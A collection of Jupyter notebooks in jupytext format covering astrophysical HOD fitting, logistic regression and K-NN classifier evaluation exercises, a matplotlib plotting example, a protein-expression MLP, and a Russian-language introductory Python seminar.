cens_occ[mb-1] = np.mean(centrals[indices_of_mb]) sats_occ[mb-1] = np.mean(satellites[indices_of_mb]) return cens_occ, sats_occ mass_bin_range = (9,16) mass_bin_size = 0.1 mass_bins = np.logspace(mass_bin_range[0], mass_bin_range[1], int( (mass_bin_range[1]-mass_bin_range[0])/mass_bin_size )+1 ) mbc = (mass_bins[1:]+mass_bins[:-1])/2 cens_occ, sats_occ = compute_occupations(halo_table ) mock_masses = halo_table[halo_table['halo_upid']==-1]['halo_mvir'] #mock_concentrations = halo_table[halo_table['halo_upid']==-1]['halo_nfw_conc'] # + active="" # from halotools.utils.table_utils import compute_conditional_percentiles # mock_percentiles = compute_conditional_percentiles(prim_haloprop = mock_masses, sec_haloprop = mock_concentrations, # prim_haloprop_bin_boundaries= mass_bins) # # splits = np.arange(0,1.1,0.2) # - cen_hod, sat_hod = compute_hod(mock_masses, cens_occ, sats_occ, mass_bins) # + active="" # cens_occs, sats_occs = [],[] # # for idx, p in enumerate(splits[:-1]): # split_idxs = np.logical_and(p<= mock_percentiles, mock_percentiles < splits[idx+1]) # # _cens_occ, _sats_occ = compute_hod(mock_masses[split_idxs], cens_occ[split_idxs], sats_occ[split_idxs], mass_bins) # # cens_occs.append(_cens_occ) # sats_occs.append(_sats_occ) # # #mass_bin_idxs = compute_prim_haloprop_bins(prim_haloprop_bin_boundaries=mass_bins, prim_haloprop = mock_masses[split_idxs]) # #mass_bin_nos = set(mass_bin_idxs) # # #for mb in mass_bin_nos: # # indices_of_mb = np.where(mass_bin_idxs == mb)[0] # # haloprop_grid[mb-1, idx] = np.mean(mock_concentrations[split_idxs][indices_of_mb]) # + active="" # from halotools.utils.table_utils import compute_conditional_percentile_values # sp_values = np.zeros((len(mass_bins)-1, (len(splits)-1))) # spv_median = np.zeros((len(mass_bins)-1,)) # # mass_bin_idxs = compute_prim_haloprop_bins(prim_haloprop_bin_boundaries=mass_bins, prim_haloprop = mock_masses[split_idxs]) # mass_bin_nos = set(mass_bin_idxs) # # q = ((splits[1:]+splits[:-1])/2)*100 # # for 
mb in mass_bin_nos: # indices_of_mb = np.where(mass_bin_idxs == mb)[0] # sp_values[mb-1, :] = np.percentile(mock_concentrations[indices_of_mb], q) # # spv_median[mb-1] = np.percentile(mock_concentrations[indices_of_mb], 50) # + active="" # for co, so, p in izip(cens_occs, sats_occs, splits[1:]): # plt.plot(mbc, co, label =p ) # # # plt.plot(mbc, cen_hod, lw = 2) # # plt.legend(loc='best') # plt.loglog() # plt.xlim([1e11,1e16]) # plt.ylim([1e-3,1.1]) # plt.show(); # + active="" # cens_model.param_dict['mean_occupation_centals_assembias_slope1'] = 1.2 # cens_model.param_dict['f_c'] = 1.0 # sats_model.param_dict['f_c'] = 1.0 # sats_model.param_dict['mean_occupation_satellites_assembias_slope1'] = 1.2 # + active="" # arg1 = np.tile(mbc, sp_values.shape[1]) # arg2 = sp_values.reshape((-1,), order = 'F') # arg3 = np.tile(spv_median, sp_values.shape[1]) # # cens_preds = cens_model.mean_occupation(prim_haloprop = arg1,\ # sec_haloprop = arg2,\ # sec_haloprop_percentile_values = arg3) # sats_preds = sats_model.mean_occupation(prim_haloprop = arg1,\ # sec_haloprop = arg2,\ # sec_haloprop_percentile_values = arg3) # # cens_preds = cens_preds.reshape((-1, sp_values.shape[1]), order = 'F') # sats_preds = sats_preds.reshape((-1, sp_values.shape[1]), order = 'F') # # for p, cp, sp, co, so in zip(splits, cens_preds.T, sats_preds.T, cens_occs, sats_occs,): # plt.plot(mbc, (cp+sp)/(co+so), label = p+0.25 ) # # # plt.legend(loc='best') # plt.loglog() # plt.xlim([1e11,1e16]) # plt.ylim([1e-3,20]) # plt.show(); # - param_dict.keys() params vals = np.array([param_dict[key] for key in params]) cens_idxs = halo_table['halo_upid'] == -1 args = (params, cen_hod, sat_hod,mbc) print params test = cens_model.mean_occupation(prim_haloprop = cat.halocat.halo_table['halo_mvir'][:100],\ sec_haloprop= cat.halocat.halo_table['halo_nfw_conc'][:100]) print np.mean(test) mbc.shape resids(vals, *args) lazy_wrapper(resids, vals, func_args = args,maxfev = 500, print_level = 1, artol = 1e-6) print params 
print MAP
notebooks/Fit HOD Directly SJ.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # ### Regularized logistic regression # + ##================ Part 0: Reading data and plotting ==================# import pandas as pd import numpy as np data = pd.read_csv('ex2data2.txt') X = np.vstack([data.x1,data.x2]).T y = data.y import matplotlib.pyplot as plt import plot_utils print 'Plotting data with green circle indicating (y=1) examples and red circle indicating (y=0) examples ...' plot_utils.plot_twoclass_data(X,y,'Chip Test 1', 'Chip Test 2',['y=0','y=1']) plt.show() #plt.savefig('fig3.pdf') # + #================ Part 1: Compute cost and gradient ==================# # open logistic_regressor.py and implement the regularized loss function # and gradient # map the features in ex2data2.txt into a pth order polynomial import sklearn from sklearn.preprocessing import PolynomialFeatures # Map X onto polynomial features and normalize p = 6 poly = sklearn.preprocessing.PolynomialFeatures(degree=p,include_bias=False) X_poly = poly.fit_transform(X) # set up the data matrix (expanded basis functions) with the column of ones as intercept XX = np.vstack([np.ones((X_poly.shape[0],)),X_poly.T]).T # set up a regularized logistic regression model from logistic_regressor import RegLogisticRegressor reg_lr1 = RegLogisticRegressor() # run fmin on the loss function and gradient reg = 1.0 theta_opt = reg_lr1.train(XX,y,reg=reg,num_iters=1000,norm=False) # print the theta found and the final loss print 'Theta found by fmin_bfgs: ',theta_opt print "Final loss = ", reg_lr1.loss(theta_opt,XX,y,0.0) # plot the decision boundary plot_utils.plot_decision_boundary_poly(X,y,theta_opt,reg,p,'Chip Test 1', 'Chip Test 2',['y = 0','y = 1']) plt.show() #plt.savefig('fig4.pdf') # + # compute accuracy on training set # implement the predict method in logistic_regressor.py 
reg_lr1.theta = theta_opt predy = reg_lr1.predict(XX) # TODO: fill in the expression for accuracy of prediction accuracy = float(np.sum(predy == y)) / predy.shape[0] print "Accuracy on the training set = ", accuracy # - # ### Comparing learned model with sklearn's logistic ridge regression # + # Compare with model learned by sklearn's logistic regression with reg = 1/C # the regularization parameter set below can be varied (on a logarithmic scale) reg = 1 # L2 regularization with sklearn LogisticRegression from sklearn import linear_model sk_logreg_l2 = linear_model.LogisticRegression(C=1.0/reg,solver='lbfgs',fit_intercept=False) sk_logreg_l2.fit(XX,y) print "Theta found by sklearn with L2 reg: ", sk_logreg_l2.coef_[0] print "Loss with sklearn theta: ", reg_lr1.loss(sk_logreg_l2.coef_[0],XX,y,0.0) plot_utils.plot_decision_boundary_sklearn_poly(X,y,sk_logreg_l2,reg,p,'Exam 1 score', 'Exam 2 score',['Not Admitted','Admitted']) plt.show() #plt.savefig('fig4_sk.pdf') # - from sklearn import model_selection def select_lambda_crossval(X,y,lambda_low,lambda_high,lambda_step,penalty): best_lambda = lambda_low # Your code here # Implement the algorithm above. num_folds = 5 best_accuracy = 0 kf = model_selection.KFold(n_splits = num_folds) for reg in np.arange(lambda_low, lambda_high, lambda_step): accuracy = 0; for train_index, test_index in kf.split(X): X_train = X[train_index] y_train = y[train_index] X_test = X[test_index] y_test = y[test_index] if (penalty == "l2"): sk_logreg = linear_model.LogisticRegression(C=1.0/reg, solver='lbfgs',fit_intercept=False, penalty=penalty) elif (penalty == "l1"): sk_logreg = linear_model.LogisticRegression(C=1.0/reg, solver='liblinear',fit_intercept=False,penalty=penalty) else: raise ValueError("Incorrect penalty type! 
Penalty can only be l2 or l1.") # sk_logreg.fit(X_train, y_train) sk_logreg.fit(XX, y) # print X_train.shape y_pred = sk_logreg.predict(X_test) # y_pred = bin_features(X_test.dot(sk_logreg.coef_[0])) # print y_pred # print y_test cur_accuracy= float(np.sum(y_pred == y_test)) / y_test.shape[0] # print "lambda = ", reg, ", accuracy = ", cur_accuracy accuracy += cur_accuracy # plot_utils.plot_decision_boundary_sklearn(X_train, y_train, sk_logreg, 'Chip Test 1', 'Chip Test 2',['y = 0','y = 1']): accuracy = accuracy / num_folds print "lambda = ", reg, ", accuracy = ", accuracy if (accuracy > best_accuracy): best_accuracy = accuracy best_lamnbda = reg # end your code return best_lambda select_lambda_crossval(XX,y,0.1,2,0.1, "l2") # + from sklearn import model_selection import utils def select_lambda_crossval_1(X,y,lambda_low,lambda_high,lambda_step,penalty): best_lambda = lambda_low # Your code here # Implement the algorithm above. best_accuracy = 0.0 for reg in np.arange(lambda_low, lambda_high, lambda_step): kf = model_selection.KFold(10) accuracy = 0.0 for train_index, test_index in kf.split(X): X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index] if penalty == 'l2': sk_logreg_l2 = linear_model.LogisticRegression(penalty=penalty, C=1.0/reg,solver='lbfgs',fit_intercept=True) elif penalty == 'l1': sk_logreg_l2 = linear_model.LogisticRegression(penalty=penalty, C=1.0/reg,solver='liblinear',fit_intercept=True) else: raise ValueError("Penalty must be l1 or l2") sk_logreg_l2.fit(XX,y) predy = utils.bin_features( X_test.dot(sk_logreg_l2.coef_[0]) ) accuracy += float(np.sum(predy == y_test)) / y_test.shape[0] print reg," Accuracy: ", accuracy/10 if accuracy > best_accuracy: best_accuracy = accuracy best_lambda = reg # end your code return best_lambda select_lambda_crossval_1(XX,y, 0.1, 5,0.1,"l2") # - # ### L1 regularized logistic regre # + # L1 regularization witk sklearn LogisticRegression sk_logreg_l1 = 
linear_model.LogisticRegression(C=1.0/reg,solver='liblinear',fit_intercept=False,penalty='l1') sk_logreg_l1.fit(XX,y) print "Theta found by sklearn with L1 reg: ", sk_logreg_l1.coef_[0] print "Loss with sklearn theta: ", reg_lr1.loss(sk_logreg_l1.coef_[0],XX,y,0.0) # plot regularization paths for L1 regression # Exploration of L1 regularization # plot_utils.plot_regularization_path(XX,y) plt.show() #plt.savefig('fig5.pdf') # -
hw2/logreg/logreg_reg.ipynb
# --- # title: "Linear Plot with Line Formatting" # author: "Sanjay" # date: 2020-09-05 # description: "-" # type: technical_note # draft: false # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: kagglevil # language: python # name: kagglevil # --- # Importing Matplotlib library from matplotlib import pyplot as plt # Assigning values Year = [1975, 1983, 1999, 2006, 2017] TamilNadu = [130.6, 158.61, 355.54, 384.76, 754.60] Assam = [10.4, 25.56, 58.75, 178.27, 254.87] # Formatting of line style and Plotting of co-ordinates plt.plot(Year, TamilNadu, color ='orange', marker ='o', markersize = 10, label ='Tamil Nadu') plt.plot(Year, Assam, color ='g', linestyle ='dashed', linewidth = 3, label ='Assam') # Labelling the plot plt.xlabel('Years') plt.ylabel('Income in crores') plt.title('Income of Tamil Nadu and Assam') plt.legend() # Function to show the plot plt.show()
docs/python/matplotlib/Linear-Plot-with-Line-Formatting.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: 'Python 3.6.13 64-bit (''d_b'': conda)' # name: python3 # --- # + from detector import Mydetector import cv2 from utils import cv2_imshow,MyZoom,CutImg,measure from sense import get_frame img,depth,oridepth = get_frame() mz = MyZoom(img) myde = Mydetector() out = myde.predictor(mz) PredCenter = out.get_fields()['pred_keypoints'][0][5].numpy() CenterDepth = depth[int(PredCenter[0])][int(PredCenter[1])] d,l = measure(out['instances'].to("cpu"),CenterDepth)
measure.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import pandas as pd data = pd.read_csv('Data_Cortex_Nuclear.csv') data.drop(['MouseID',],axis=1, inplace=True) pd.DataFrame(data[:10]) data = data.drop(['Treatment', 'Behavior', 'class'],axis=1) data.fillna(value=0) # + data.isnull().sum() # - data.corr() import numpy as np columns = data.columns X_data = data[columns[:-1]] y_data = data[columns[-1]] X_data.replace('',np.NaN,inplace=True) from sklearn.preprocessing import Imputer imputer = Imputer() imputer.fit(X_data) #THIS IS A MUST OR THE LABELS WITH BE NUMERICAL AND THE PROTEIN EXPRESSION WILL BE UNKNOWN TO MOST OF US X_data = pd.DataFrame(columns=X_data.columns,data=imputer.transform(X_data)) pd.DataFrame(X_data[:10]) X_data.isnull().sum() X_data.corr() from sklearn.model_selection import train_test_split X_train,X_test,y_train,y_test = train_test_split(X_data,y_data,test_size=.3) print(X_train.shape) print(X_train[:5]) print(y_train.shape) print(y_train[:5]) print(X_test[:5]) print(y_test) # + from sklearn.neural_network import MLPClassifier clf = MLPClassifier(solver='adam', validation_fraction=.3,alpha=.000055, hidden_layer_sizes=(25,25,8), random_state=1,tol=.000000099,verbose=True) clf.fit(X_train, y_train) y_train.shape # - clf.score(X_test,y_test) print(clf.predict(X_test[:10])) print(y_test[:10]) pd.DataFrame(clf.predict_proba(X_test[:10])) pd.DataFrame(X_test[:3]) pd.DataFrame(y_test[:3])
MICE PROTEIN EXPRESSION.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # # Evaluating the Performance of the Classifier # # In this notebook we are going to evaluate the performance of the K-NN classifier built for the **Iron Ore** dataset. In order to have a clean notebook, some functions are implemented in the file *utils.py* (e.g., plot_learning_curve). We are not going to discuss the implementation aspects of these functions as it is not the scope, but you can explore and read the content of the functions later on. # # Summary: # - [Data Pre-processing](#data_preprocessing) # - [Building the K-Nearest Neighbors Classifier](#models) # - [Quantifying the Quality of Predictions](#pred) # - [Accuracy](#accuracy) # - [Confusion Matrix](#confusion) # - [Precision and Recall](#precision) # - [F1-score](#f1score) # - [Receiver Operating Characteristic (ROC) and Area Under the Curve (AUC)](#roc) # - [K-fold Cross-Validation](#kfold) # - [Learning Curve](#learning) # # __All the libraries used in this notebook are <font color='red'>Open Source</font>__. # ## Data Pre-processing # <a id=data_preprocessing></a> # + code_folding=[0] # Standard libraries import numpy as np # written in C, is faster and robust library for numerical and matrix operations import pandas as pd # data manipulation library, it is widely used for data analysis and relies on numpy library. 
import matplotlib.pyplot as plt # for plotting import seaborn as sns # plot nicely =) from sklearn.model_selection import train_test_split #split arrays or matrices into random train and test subsets from sklearn.preprocessing import StandardScaler #Standardize features by removing the mean and scaling to unit variance # Auxiliar functions from utils import * # the following to lines will tell to the python kernel to always update the kernel for every utils.py # modification, without the need of restarting the kernel. # %load_ext autoreload # %autoreload 2 # using the 'inline' backend, your matplotlib graphs will be included in your notebook, next to the code # %matplotlib inline # - # For this first example, we will work on the same dataset as the previous notebook, the **Iron Ore** dataset. # + code_folding=[0] # reading dataset df = pd.read_csv('../data/iron_ore_study.csv') # Splits from oscar Fe>60%, SiO2<9, Al2O3<2, P<0.08 split_points = [ ('FE', 60, [False, True]), ('SIO2', 9, [True, False]), ('AL2O3', 2, [True, False]), ('P', 0.08, [True, False]), ] # It's ore if everything is True df['is_ore'] = np.vstack([ pd.cut(df[elem], bins=[0, split, 100], labels=is_ore) for elem, split, is_ore in split_points ]).sum(axis=0) == 4 y = df.is_ore # set the variable 'y' to store the labels # removing is_ore from the dataframe list = ['is_ore'] df = df.drop(list,axis = 1 ) # split data train 70% and test 30%. You can try other splits here. 
x_train, x_test, y_train, y_test = train_test_split(df, y, test_size=0.3, random_state=42) y_train = y_train.values # converting to numpy array y_test = y_test.values # converting to numpy array # normalising the data scaler = StandardScaler() scaler.fit(x_train) # not considering the label is_ore x_train_scaled = scaler.transform(x_train) x_test_scaled = scaler.transform(x_test) # - # ## Building the K-Nearest Neighbors Classifier # <a id=models></a> # + from sklearn.neighbors import KNeighborsClassifier #Classifier implementing the k-nearest neighbors vote. clf_knn = KNeighborsClassifier(n_neighbors=3) clf_knn.fit(x_train_scaled, y_train) # - # ## Quantifying the Quality of Predictions # <a id=pred></a> # # The performance assessment of the **classifiers** is extremely important in practice, as this provide insights of how the classifier performs with new data, in which me measure the **generalisation error**. # # Summary: # - [Accuracy](#accuracy) # - [Confusion Matrix](#confusion) # - [Precision and Recall](#precision) # - [F1-score](#f1score) # - [Receiver Operating Characteristic (ROC) and Area Under the Curve (AUC)](#roc) # - [K-fold Cross-Validation](#kfold) # - [Learning Curve](#learning) # ### Accuracy # <a id=accuracy></a> # # Computes the accuracy of the classifier by using the following equation: # # $$accuracy = \frac{1}{N}\sum_{i=0}^N{1*(\hat{y}==y)}$$ # where $y$ is the true label, $\hat{y}$ the predicted label and $N$ is the number of samples. # + from sklearn.metrics import accuracy_score # we are using prediction computed previsously prediction = clf_knn.predict(x_test_scaled) accuracy_knn = accuracy_score(y_test, prediction) print('Accuracy: ', accuracy_knn) # - # Nice! We just got 97.4% of **accuracy**. Can we assume that we are done? Let's use other tools to quantify the quality of predictions for our classifier. 
# ### Confusion Matrix # <a id=confusion></a> # # The confusion matrix is a tool/technique for summarising the performance of the classifier. We can have better insights about when the classifier is getting right and what are the types of errors it is making. It can be very useful for a further improvement of our models. # # <img src="imgs/cm.png" alt="Drawing" style="width: 400px;"/> # # # In the image above, we have: # - **True Positive (TP):** correctly predicted event values. # - **False Positive (FP):** incorrectly predicted event values. # - **True Negative (TN):** correctly predicted no-event values. # - **False Negative (FN):** incorrectly predicted no-event values. # # + # confusion_matrix: computes confusion matrix to evaluate the accuracy of a classification from sklearn.metrics import confusion_matrix cm = confusion_matrix(y_test, prediction) sns.heatmap(cm, annot=True,fmt="d") # - # ### Precision-Recall # <a id=precision></a> # # The confusion matrix give us a lot of information, but sometimes we may need a better metric in order to evaluate the classifier accuracy. Precision and recall scores are two metrics naturally provided by confusion matrix evaluation. # # # Precision is given by the equation: # # $$precision = \frac{TP}{TP + FP}$$ # where $TP$ is the number of True Positives and $FP$ is the number of False Positives. # # # Recall is given by the equation: # # $$recall = \frac{TP}{TP + FN}$$ # where $TP$ is the number of True Positives and $FN$ is the number of False Negatives. 
# # # + # Libraries: # precision_score: computes precision score # recall_score: computes recall score from sklearn.metrics import precision_score, recall_score # we are using prediction computed previsously precision_knn = precision_score(y_test, prediction) recall_knn = recall_score(y_test, prediction) print('Precision: ', precision_knn) print('Recall: ', recall_knn) # - # ### F1-score # <a id=f1score></a> # # Also known as **F-Measure**, can be interpreted as a weighted average of the precision and recall. The formula for F1-score is: # # $$f_1 = 2 * \frac{precision * recall}{precision+recall}$$ # + from sklearn.metrics import f1_score # computes the f1 score # we are using prediction computed previsously f1_score_knn = f1_score(y_test, prediction) print('F1-score: ', f1_score_knn) # - # ### Receiver Operating Characteristic (ROC) and Area Under the Curve (AUC) # <a id=roc></a> # # #### Receiver Operating Characteristic (ROC) # ROC curve plot the *true positive rate-TPR* (a.k.a. *recall score*) against the *false negative rate-FPR*. FPR is the ratio of negative instances that are incorrectly classifier as positive. # # # #### Area Under the Curve (AUC) # + # Libraries: # roc_curve: computes the receiver operating characteristic curve # roc_auc_score: computes Area Under the Receiver Operating Characteristic Curve score from sklearn.metrics import roc_curve, roc_auc_score # computing and plotting the ROC curve fpr, tpr, _ = roc_curve(y_test, prediction) plot_roc_curve(fpr=fpr, tpr=tpr) # computing the AUC (Area Under the Curve) auc_knn = roc_auc_score(y_test, prediction) print('AUC: ', auc_knn) # - # ##### K-fold Cross-Validation # <a id=kfold></a> # + # We are using the library StratifiedKFold for this task. # The StratifiedKFold performs stratified sampling to produce folds that contain a representative ratio of each # class. 
At each iteraction the code create a clone of the classifier, train that clone on the training # folds, and makes prediction on the test fold. from sklearn.model_selection import StratifiedKFold from sklearn.base import clone cv = StratifiedKFold(n_splits=5, shuffle=True, random_state=42) auc_scores = [] f1_scores = [] for train, test in cv.split(x_train_scaled, y_train): clone_clf = clone(clf_knn) # splitting the training set x_train_folds = x_train_scaled[train] y_train_folds = y_train[train] x_test_folds = x_train_scaled[test] y_test_folds = y_train[test] # building the classifier clone_clf.fit(x_train_folds, y_train_folds) y_pred = clone_clf.predict(x_test_folds) # computing the auc score auc_scores.append(roc_auc_score(y_test_folds, y_pred)) # computing the f1-score f1_scores.append(f1_score(y_test_folds, y_pred)) fold = 1 print('Fold\tAUC\tF1-score') for auc, f1 in zip(auc_scores, f1_scores): print('{}\t{:.3f}\t{:.3f}'.format(fold, auc, f1)) fold += 1 print() print('Mean AUC: {:.3f}'.format(np.array(auc_scores).mean())) print('Mean F1-score: {:.3f}'.format(np.array(f1_scores).mean())) # - # ##### Learning Curve # <a id=learning></a> # + from sklearn.model_selection import StratifiedKFold # SVC is more expensive so we do a lower number of CV iterations: cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=42) plot_learning_curve(clf_knn, title='K-NN Learning Curve', X=x_train_scaled, y=y_train, ylim=(0.85, 1.01), cv=cv, n_jobs=5) # - # #### Your Turn: # # 1) Build a classifier, you can choise a Random Forest or SVM. # 1.1) Build the classifier # # For example, for Random Forest you can do: # ```python # from sklearn.ensemble import RandomForestClassifier # implements random decision forest. # # clf_rf = RandomForestClassifier(n_estimators=20) # 20 trees in the forest. 
# clf_rf.fit(x_train_scaled, y_train) # ``` # 1.2) Evaluate the classifier # # In the case of Random Forest, you can do: # ```python # pred_rf = clf_rf.predict(x_test_scaled) # ``` # 2) Evaluate the performance of the classifier by using the metrics presented in this notebook: # 2.1) Precision and Recall # # For example: # ```python # precision_rf = precision_score(y_test, pred_rf) # recall_rf = recall_score(y_test, pred_rf) # # print('Precision: ', precision_rf) # print('Recall: ', recall_rf) # ``` # 2.2) F1-score # # For example: # ```python # f1_score_rf = f1_score(y_test, pred_rf) # print('F1-score: ', f1_score_rf) # ``` # 2.3) Plot the ROC curve and compute the AUC score # # For example: # ```python # # computing and plotting the ROC curve # fpr, tpr, _ = roc_curve(y_test, pred_rf) # plot_roc_curve(fpr=fpr, tpr=tpr) # # # computing the AUC (Area Under the Curve) # auc_rf = roc_auc_score(y_test, pred_rf) # print('AUC: ', auc_rf) # ``` # 3) Can we do better? # # To answer this question, compute the learning curve: # # For example: # ```python # cv = StratifiedKFold(n_splits=10, shuffle=True, random_state=42) # # plot_learning_curve(clf_rf, title='Random Forest Learning Curve', # X=x_train_scaled, # y=y_train, # ylim=(0.85, 1.01), # cv=cv, # n_jobs=5) # ``` # # **PS: if you are using SVM, choose n_splits small**. # # # If you wish, compute the K-fold Stratified Cross validation to get better insights. # 4) Compare the evaluation results for the different classifier with the previous K-NN classifier. Could you find some insights about the performance of both classifiers?
notebooks/.ipynb_checkpoints/pm1-performance-evaluation-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # <center> # <img src="http://i0.kym-cdn.com/photos/images/original/000/234/765/b7e.jpg" height="400" width="400"> # </center> # # # Первому семинару приготовиться # __Наша цель на сегодня:__ # # * Запустить анаконду быстрее, чем за 20 минут. # * Попробовать python на вкус # * Решить пару простых задач и залить их в Яндекс.Контест # ## 0. Куда это я попал? # # __Jupyter Notebook__ - это штука для интерактивного запуска кода в браузере. Много где используют. Можно писать код, выполнять его и смотреть на результат. # # Напиши в ячейке ниже `2 + 2` и нажми на кнопки __Shift__ и __Enter__ одновременно. Твой код выполнится и ты увидишь ответ. Дальше так и будем писать код. # напиши код прямо тут вместо трёх точек ... # > Ещё у ячеек бывает разный тип. В этой части семинара ваш семинарист немного поучит вас работать в тетрадках с Markdown. # # # ### Markdown # # - [10-минутный урок по синтаксису](https://www.markdowntutorial.com/) # - [Короткий гайд по синтаксису](https://guides.github.com/features/mastering-markdown/) # ## 1. Python как калькулятор # # Можно складывать, умножать, делить и так далее... 4 * 7 3 * (2 + 5) 5 ** 3 5 / 2 5 // 2 #Человек против машины: раунд 1, угадайте, что получится? 5 % 2 #а тут? # Как обстоят дела с другими операциями? Попробуем извлечь квадратный корень: sqrt(4) # Извлечение квадратного корня не входит в комплект математических операций, доступных в Python по умолчанию, поэтому вместо ответа мы получили какую-то непонятную ругань. # # Эта непонятная ругань называется исключением, когда-нибудь мы научимся их обрабатывать, а сейчас обратим внимание на последнюю строчку: `NameError: name 'sqrt' is not defined` — то есть «я не понимаю, что такое sqrt». Однако, не всё так плохо: соответствующая функция есть в модуле math. 
Чтобы ей воспользоваться, нужно импортировать этот модуль. Это можно сделать разными способами. import math math.sqrt(4) # После того, как модуль `math` импортирован, вы можете узнать, какие ещё в нём есть функции. В __IPython Notebook__ для этого достаточно ввести имя модуля, поставить точку и нажать кнопку __«Tab»__. Вот, например, синус: math.sin(0) # Приведенный синтаксис может оказаться неудобным, если вам часто приходится вызывать какие-то математические функции. Чтобы не писать каждый раз слово «math», можно импортировать из модуля конкретные функции. from math import sqrt sqrt(4) # Также можно подгрузить какой-нибудь модуль или пакет, но при этом изменить у него название на более короткое и пользоваться им. import math as mh mh.sqrt(4) # ## 2. Переменные # # Понятие «переменной» в программировании похоже на аналогичное понятие в математике. Переменная — это ячейка памяти, обозначаемая каким-то именем. В этой ячейке могут храниться числа, строки и более сложные объекты. Мы пока поработаем немножко с числовыми переменными. x = 4 x x = x + 2 x # А что будет в $x$, если запустить ячейку ещё раз? # ## 3. Типы # # Попробуем записать числа по-разному 4 * 42 '4' * 42 #Человек против машины: раунд 2, угадайте, что получится? # Для каждого типа арифметика работает по-своему! a = 'ёж' b = 'ик' a + b type(4) type('4') type(4.0) type(True) # - `str` - текстовый # - `int` - целочисленный # - `float` - число с плавающей запятой (обычное действительное число) # - `bool` - булева переменная # Иногда можно переходить от одного типа переменной к другому. # + x = '42' print(type(x)) x = int(x) print(type(x)) # - # А иногда нет. Включайте логику :) # + x = 'Люк, я твой отец' print(type(x)) x = int(x) print(type(x)) # - # Булевы переменные возникают при разных сравнениях, их мы будем активно использовать на следующем семинаре. 2 + 2 == 4 2 + 2 == 5 x = 5 x < 8 # ## 4. Вещественные числа и погрешности # # Вещественные числа в программировании не так просты. 
Вот, например, посчитаем синус числа $\pi$: from math import pi, sin sin(pi) #думаете, получится 0? Ха-ха! # Непонятный ответ? Во-первых, это так называемая [компьютерная форма экспоненциальной записи чисел.](https://ru.wikipedia.org/wiki/Экспоненциальная_запись#.D0.9A.D0.BE.D0.BC.D0.BF.D1.8C.D1.8E.D1.82.D0.B5.D1.80.D0.BD.D1.8B.D0.B9_.D1.81.D0.BF.D0.BE.D1.81.D0.BE.D0.B1_.D1.8D.D0.BA.D1.81.D0.BF.D0.BE.D0.BD.D0.B5.D0.BD.D1.86.D0.B8.D0.B0.D0.BB.D1.8C.D0.BD.D0.BE.D0.B9_.D0.B7.D0.B0.D0.BF.D0.B8.D1.81.D0.B8) Она удобна, если нужно уметь записывать очень большие или очень маленькие числа:`1.2E2` означает `1.2⋅10^2`, то есть `1200`, а `2.4e-3` — то же самое, что `2.4⋅10^(-3) = 0.0024`. # # Результат, посчитанный Python для $\sin \pi$, имеет порядок `10^(-16)` — это очень маленькое число, близкое к нулю. Почему не «настоящий» ноль? Все вычисления в вещественных числах делаются компьютером с некоторой ограниченной точностью, поэтому зачастую вместо «честных» ответов получаются такие приближенные. К этому надо быть готовым. #Человек против машины: раунд 3, угадайте, что получится? 0.4 - 0.3 == 0.1 0.4 - 0.3 # Когда сравниваете вещественные числа будьте осторожнее. # ## 5. Ввод и вывод # # Работа в Jupyter редко требует писать код, который сам по себе запрашивает данные с клавиатуры, но для других приложений (и в частности для домашних работ) это может потребоваться. К тому же, написание интерактивных приложений само по себе забавное занятие. Напишем, например, программу, которая здоровается с нами по имени. name = input("Введите ваше имя: ") print("Привет,",name) name # Что здесь произошло? В первой строчке мы использовали функцию `input`. Она вывела на экран строчку, которую ей передали (обязательно в кавычках) и запросила ответ с клавиатуры. Я его ввёл, указав своё имя. После чего `input` вернула строчку с именем и присвоила её переменной `name`. 
# # После этого во второй строке была вызвана функция `print` и ей были переданы две строчки — "Привет," и то, что хранилось в переменной `name` Функция `print` вывела эти две строчки последовательно, разделив пробелом. Заметим, что в переменной `name` по-прежнему лежит та строчка, которую мы ввели с клавиатуры. # Попробуем теперь написать программу «удвоитель». Она должна будет принимать на вход число, удваивать его и возвращать результат. x = input("Введите какое-нибудь число: ") y = x * 2 print(y) # Что-то пошло не так. Что именно? Как это исправить? # ## 6. Учимся дружить с поисковиками # # __Задача:__ я хочу сгенерировать рандомное число, но я не знаю как это сделать. # # В этом месте ваш семинарист совершит смертельный номер. Он загуглит у вас на глазах как сгенерировать случайное число и найдёт код для этого. # + # Местечко для маленького чуда # - # Увидели чудо? Давайте договоримся, что вы не будете стесняться гуглить нужные вам команды и искать ответы на свои вопросы в интернете. Если уж совсем не выходит, задавайте их в наш чат технической поддержки в Телеграм. # ## 7. Контест # # Яндекс.Контест - это система для автоматического тестирования кода. Вы будете сталкиваться с ней в течение всего нашего курса. Давайте попробуем поработать с ней и перенесём туда решение задачки с вводом имени. # # > Задачи для первого семинара доступны тут: https://official.contest.yandex.ru/contest/24363/enter/ # # Всё оставшееся время мы будем решать задачи из контеста. Рекомендуемый список: B,H,O,X, любые другие :) # + ### ╰( ͡° ͜ʖ ͡° )つ▬▬ι═══════ bzzzzzzzzzz # will the code be with you # - # ## 8. Дзен Python и PEP-8 # # Как мы увидели выше, команда `import` позволяет подгрузить различные пакеты и модули. Один из модулей, который обязательно нужно подгрузить на первой же паре - это модуль `this` import this # Разработчики языка Python придерживаются определённой философии программирования, называемой «The Zen of Python» («Дзен Питона», или «Дзен Пайтона»). 
